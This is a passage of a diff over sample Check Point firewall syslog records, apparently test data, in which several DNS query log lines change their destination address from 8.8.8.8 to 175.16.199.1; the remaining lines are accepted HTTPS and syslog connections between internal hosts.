rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500828"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:53:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d29e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T16:53:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500830"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51400"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500830"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51400"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; 
version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50043"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50044"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50045"; 
service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50046"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T16:53:58Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500838"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38270"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51214"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:54:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500840"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42118"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:54:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500849"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32849"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:54:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b2,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500850"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55943"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:54:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bb,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500859"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:54:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bc,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500860"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:58Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500838"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38270"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51214"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:54:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500840"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42118"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:54:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500849"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32849"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:54:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b2,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500850"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55943"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:54:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bb,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500859"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:54:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bc,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500860"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:54:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2bd,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32890"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60032"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10230"; xlatesrc:"0.0.0.0"] 
@@ -1521,13 +1521,13 @@
